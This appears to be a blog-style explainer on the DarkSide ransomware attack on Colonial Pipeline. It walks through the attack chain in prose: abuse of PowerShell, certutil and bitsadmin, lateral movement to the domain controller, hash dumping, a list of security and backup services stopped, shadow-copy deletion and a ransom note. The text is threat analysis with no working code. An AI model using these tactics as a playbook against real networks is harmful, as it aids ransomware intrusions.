Dark side ransomware on colonial pipeline network

We all know about the recent ransomware attack on Colonial pipeline. With regard to this, let us try to understand what happened exactly:

About the firm: The largest refined products pipeline in the US, it is involved in transporting over 100 million gallons of fuel across their corridors.

The recent ransomware attack against colonial pipeline's networks led to an emergency declaration in 17 states and the district of Columbia across 5,500 miles of fuel pipeline

Let’s understand about Darkside ransomware

Darkside is a relatively new ransomware strain that made its first appearance in August 2020. It follows RaaS (ransomware-as-a-service) model.

It follows a double extortion trend like:

1.      Threat actors encrypt the user’s data

2.      Exfiltrate the data and threaten to make it public if the ransom demand is not paid.

Their ransom demand ranges between $200,000 to $2,000,000.

Let’s now understand how the attack vector of this:

1.      Downloading the ransomware- it is specialized to start post gaining an initial foothold in the network

2.      The attackers use PowerShell to download the darkside binary as “update.exe” using the “download file” command, abusing certutil.exe and bitsadmin.exe in the process

3.      It downloads the darkside binary into the c:\windows and temporary directories as well as creating a shared folder on the infected machine and using PowerShell to download a copy of the malware there.

4.      Post initial access, the attacker than uses lateral movement, with the main goal of conquering the domain controller (DC)

5.      Post getting domain access, user hashes are dumped

6.      The attackers use PowerShell to download the darkside binary from the shared folder created on the initial system (patient zero)

7.      A shared folder using the company’s name on the DC is created and darkside binary is coped in it.

8.      Post data exfiltration, attackers use bitsadmin.exe to distribute the ransomware binary from the shared folder to systems

Mode of infection of the ransomware:

1.      Post execution on initial host, it checks the language on the system, using getsystemdefaultuilanguage() and getuserdefaultlangid() functions to avoid systems located in the former soviet bloc countries from being encrypted

2.      Then certain services related to security and backup solutions are stopped including:

·        Vs

·        sql

·        svc

·        memtas

·        Mepocs       

·        sophos

·        veeam         

·        backup

3.      A C2C (command and control) server is established with different samples analyzed, the attackers uses its programmed IPs.

4.      Post deleting the volume shadow copy service (vss), the ransomware deletes the shadow copies using an obfuscated PowerShell script that uses WMI

5.      Running processes are enumerated and the common goal is to both steal related information stored in the files as well as encrypt them.

6.      Darkside creates a unique user_id string for the victim, and adds it to the encrypted files extension as <file_name>.{userid}. In addition, the malware also changes the icons for the encrypted files and changes the background of the desktop:

7.      It finally leaves a ransom note: “readme.{userid}.txt”: